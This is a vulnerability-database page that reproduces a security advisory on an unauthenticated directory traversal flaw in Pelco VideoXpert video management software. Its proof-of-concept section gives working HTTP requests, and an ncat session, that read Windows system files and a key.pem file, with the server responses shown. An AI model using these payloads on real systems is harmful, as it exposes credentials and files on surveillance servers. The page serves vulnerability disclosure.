Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Schneider Electric Pelco VideoXpert Core Admin Portal Directory Traversal

🗓️ 10 Jul 2017 00:00:00Reported by Gjoko KrsticType 
zeroscience
 zeroscience🔗 www.zeroscience.mk👁 124 Views

Schneider Electric Pelco VideoXpert Core Admin Portal Directory Traversal. Directory traversal vulnerability in Pelco VideoXpert allows unauthenticated attacker to view arbitrary files within the context of the web server. Impact includes exposure of system information and sensitive information

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2017-9965
5 Oct 202510:02
circl
CNVD		Schneider Electric Pelco VideoXpert Enterprise Directory Traversal Vulnerability (CNVD-2017-38304)
28 Dec 201700:00
cnvd
CVE		CVE-2017-9965
2 Jan 201803:00
cve
Cvelist		CVE-2017-9965
2 Jan 201803:00
cvelist
EUVD		EUVD-2017-18874
7 Oct 202500:30
euvd
ICS		Schneider Electric Pelco VideoXpert Enterprise
21 Dec 201700:00
ics
Nuclei		Schneider Electric Pelco VideoXpert Enterprise 2.0 - Path Traversal
4 Jun 202603:48
nuclei
NVD		CVE-2017-9965
2 Jan 201803:29
nvd
OpenVAS		Pelco VideoXpert Multiple Vulnerabilities
11 Jul 201700:00
openvas
Prion		Directory traversal
2 Jan 201803:29
prion
Rows per page
<html><body><p>Schneider Electric Pelco VideoXpert Core Admin Portal Directory Traversal


Vendor: Schneider Electric SE
Product web page: https://www.pelco.com
Affected version: 2.0.41
                  1.14.7
                  1.12.105

Summary: VideoXpert is a video management solution designed for
scalability, fitting the needs surveillance operations of any size.
VideoXpert Ultimate can also aggregate other VideoXpert systems,
tying multiple video management systems into a single interface.

Desc: Pelco VideoXpert suffers from a directory traversal vulnerability.
Exploiting this issue will allow an unauthenticated attacker to
view arbitrary files within the context of the web server.


Tested on: Microsoft Windows 7 Professional SP1 (EN)
           Jetty(9.2.6.v20141205)
           MongoDB/3.2.10


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2017-5419
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5419.php


05.04.2017

--


PoC:
----

GET /portal//..\\\..\\\..\\\..\\\windows\win.ini HTTP/1.1
Host: 172.19.0.198
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close


HTTP/1.1 200 OK
Date: Wed, 05 Apr 2017 13:27:39 GMT
Last-Modified: Tue, 14 Jul 2009 05:09:22 GMT
Cache-Control: public, max-age=86400
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
ETag: 1247548162000
Content-Length: 403
Connection: close

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo


------


GET /portal//..\\\..\\\..\\\..\\\ProgramData\Pelco\Core\db\security\key.pem HTTP/1.1
Host: 172.19.0.198
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close


HTTP/1.1 200 OK
Date: Thu, 06 Apr 2017 11:59:07 GMT
Last-Modified: Wed, 05 Apr 2017 12:58:36 GMT
Cache-Control: public, max-age=86400
Content-Type: text/html; charset=UTF-8
ETag: 1491397116000
Content-Length: 9
Connection: close

T0ps3cret


------


bash-4.4$ cat pelco_system_ini.txt
GET /portal//..\\\..\\\..\\\..\\\windows\system.ini HTTP/1.1
Host: 172.19.0.198
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

bash-4.4$ ncat -v -n 172.19.0.198 80 &lt; pelco_system_ini.txt
Ncat: Version 7.40 ( https://nmap.org/ncat )
Ncat: Connected to 172.19.0.198:80.
HTTP/1.1 200 OK
Date: Thu, 06 Apr 2017 12:30:01 GMT
Last-Modified: Wed, 10 Jun 2009 21:08:04 GMT
Cache-Control: public, max-age=86400
Content-Type: text/html; charset=UTF-8
ETag: 1244668084000
Content-Length: 219
Connection: close

; for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON

[drivers]
wave=mmdrv.dll
timer=timer.drv

[mci]
Ncat: 220 bytes sent, 460 bytes received in 0.03 seconds.
bash-4.4$ 

</p></body></html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
10 Jul 2017 00:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 25
CVSS 35.8
EPSS0.0009
schneider electricpelco videoxpertdirectory traversalvulnerabilityunauthenticatedweb serversystem informationsensitive informationsecurity advisory
124